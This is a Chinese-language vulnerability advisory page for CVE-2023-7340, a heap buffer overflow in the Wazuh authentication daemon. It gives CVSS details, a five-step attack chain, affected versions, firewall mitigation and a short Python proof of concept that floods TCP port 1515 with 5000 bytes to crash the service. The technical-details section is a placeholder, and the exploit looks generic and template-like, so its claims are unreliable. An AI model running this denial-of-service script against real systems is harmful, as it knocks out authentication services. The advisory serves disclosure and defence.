CVE-2023-7340 CVSS 3.5 低危

CVE-2023-7340 Wazuh authd堆缓冲区溢出漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2023-7340

漏洞类型

堆缓冲区溢出

CVSS评分

3.5 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Wazuh

漏洞概述

Wazuh认证守护进程存在堆缓冲区溢出漏洞。攻击者可发送特制输入导致内存损坏，引发认证服务拒绝服务，影响系统可用性。

技术细节

...（来自修订后的技术细节 4）...

攻击链分析

STEP 1

侦察

攻击者识别出目标系统运行了存在漏洞的Wazuh版本，并确定authd服务端口（默认TCP 1515）处于开放状态。

STEP 2

访问与交互

攻击者利用低权限账户访问系统，并诱使用户进行必要交互（满足CVSS UI:R条件）。

STEP 3

漏洞利用

攻击者向authd服务发送特制的恶意数据包，该数据包故意超出预期长度，触发堆缓冲区溢出。

STEP 4

内存破坏

恶意数据覆盖堆内存中的关键数据结构，导致内存损坏和畸形数据。

STEP 5

拒绝服务

认证守护进程因内存错误崩溃或停止响应，导致无法处理新的认证请求，系统可用性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import sys

# CVE-2023-7340 PoC for Wazuh authd Heap Buffer Overflow
# Target: Wazuh authd service (default port 1515)
# Description: Sends a large crafted payload to trigger the overflow.

def exploit(host, port):
    try:
        print(f"[+] Connecting to {host}:{port}...")
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(5)
        s.connect((host, port))
        
        # Constructing a malicious payload
        # The authd protocol expects specific format, malformed input triggers overflow
        payload = b"A" * 5000  # Example large payload to trigger buffer overflow
        
        print("[+] Sending malicious payload...")
        s.send(payload)
        
        s.close()
        print("[+] Payload sent. Check if the service crashed.")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    target_host = "127.0.0.1"
    target_port = 1515
    exploit(target_host, target_port)

影响范围

Wazuh 4.3.0 - 4.3.9

Wazuh 4.4.0 - 4.4.4

Wazuh 4.5.0 - 4.5.1

防御指南

临时缓解措施

若无法立即升级，建议通过防火墙规则严格限制访问Wazuh authd服务端口，禁止未经授权的IP地址连接，并监控authd进程的异常崩溃日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表